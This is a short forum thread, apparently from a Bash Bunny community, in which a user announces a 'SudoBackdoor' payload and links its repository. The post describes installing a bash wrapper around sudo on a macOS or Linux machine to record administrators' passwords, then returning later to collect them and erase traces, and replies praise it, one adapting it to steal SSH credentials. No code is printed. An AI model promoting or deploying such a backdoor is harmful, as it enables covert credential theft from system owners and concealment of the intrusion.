[PAYLOAD]SudoBackdoor

[oXis]

Ding ding, it's payload time 

 

This is a two stages payload.

First you use the 'injector' that will install a small bash script which is a wrapper for sudo. The script will store the passwords.

Second, you use the 'cleaner' to get the passwords back and clean the backdoor.

 

So basically, you get access to a computer running MacOS or Linux (you can config the payload by setting mac=true) and you install the backdoor. A couple of hours/days/weeks later you comme back, grab the passwords and erase traces. Easy 

 

Link: https://github.com/oXis/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor

I'll submit a pull request but first I need people to test this on MacOS and Linux. It works on my Linux Mint.

 

Ninja! 

Edited April 28, 2017 by oXis

[VincBreaker]

Great idea, well coded, may become really handy, thank you :)

[Michael Weinstein]

This was awesome.  Hope you don't mind, I'm using this as a start to get my first bunny payload for snagging SSH credentials.

[oXis]

[TecTom2003]

I'm sorry, but what does this do? I don't know much about anything.

[oXis]

Replace sudo with a little bash script that acts like a wrapper around the real sudo to get sniff the password when the admin is using the sudo command.